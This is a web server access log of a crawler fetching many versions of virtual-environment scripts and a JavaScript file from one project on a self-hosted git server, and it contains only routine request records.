+[17/Feb/2026:15:29:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 9961] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:15:29:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/httpx" [Client 74.7.227.38] [Length 9893] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/httpx" +[17/Feb/2026:15:29:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:15:29:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 10412] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:15:29:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:15:29:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:15:29:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 11434] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:15:29:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 13250] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:15:29:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:15:29:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:15:29:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 10418] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:15:29:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 22437] [Gzip 11.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:15:29:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 256] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:15:29:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:15:29:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/httpx" [Client 74.7.227.38] [Length 10375] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/httpx" +[17/Feb/2026:15:29:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 2221] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:15:29:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 9033] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:15:29:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 12149] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:29:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 10429] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:15:29:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 9991] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:15:29:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/httpx" [Client 74.7.227.38] [Length 248] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/httpx" +[17/Feb/2026:15:29:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 16] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:15:29:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 11529] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:29:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:15:29:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 11560] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:29:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 11060] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:29:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:15:29:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 19884] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:29:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 11431] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:15:29:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:15:29:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 16] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:15:29:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 22025] [Gzip 6.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/js" +[17/Feb/2026:15:29:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 10421] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:15:29:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:15:29:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 10413] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:15:29:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:15:29:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:15:29:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:15:29:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 9980] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:15:29:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 9033] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:15:29:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 256] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:15:29:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 22426] [Gzip 11.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:15:29:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:15:29:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 25194] [Gzip 12.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:15:29:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 11073] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:15:29:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 10422] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:15:29:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:15:29:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 11070] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:29:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 27366] [Gzip 7.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js" +[17/Feb/2026:15:29:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr 